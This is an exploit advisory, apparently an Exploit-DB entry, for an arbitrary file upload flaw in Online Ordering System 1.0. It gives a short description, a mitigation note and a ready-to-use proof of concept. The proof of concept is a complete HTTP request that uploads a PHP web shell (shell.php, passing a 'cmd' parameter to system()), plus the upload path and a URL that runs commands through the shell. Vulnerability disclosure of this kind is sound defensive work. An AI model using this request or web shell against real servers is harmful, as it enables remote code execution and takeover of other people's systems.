Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution

vendor:

Online Ordering System

by:

Suraj Bhosale

9.8

CVSS

HIGH

Arbitrary File Upload to Remote Code Execution

434

CWE

Product Name: Online Ordering System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10, XAMPP

2021

Online Ordering System 1.0 – Arbitrary File Upload to Remote Code Execution

An attacker can upload a malicious file to the web server by exploiting the arbitrary file upload vulnerability in the Online Ordering System 1.0. This vulnerability can be exploited by an attacker to execute arbitrary code on the web server.

Mitigation:

The application should validate the file type before uploading it to the server. The application should also restrict the file size and file type to be uploaded.

Source

Exploit-DB raw data:

# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
# Date: 04/03/2021
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10, XAMPP


Request:
========

POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
Gecko/20100101 Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------14955282031852449676680360880
Content-Length: 972
Origin: http://localhost
Connection: close
Referer: http://localhost/onlineordering/GPST/store/index.php
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
Upgrade-Insecure-Requests: 1

-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="transnum"

VAF-XAP
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select1"

25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="pname"

keychain
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select2"

1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="txtDisplay"

25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="note"

test
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo "Shell";system($_GET['cmd']); ?>
-----------------------------14955282031852449676680360880--

Response:
=========

HTTP/1.1 200 OK
Date: Thu, 04 Mar 2021 13:28:27 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 55
Connection: close
Content-Type: text/html; charset=UTF-8

<meta http-equiv="refresh" content="1; url=index.php">

# Uploaded Malicious File can be Found in :
onlineordering\GPST\store\design

# go to
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
which will execute hostname command.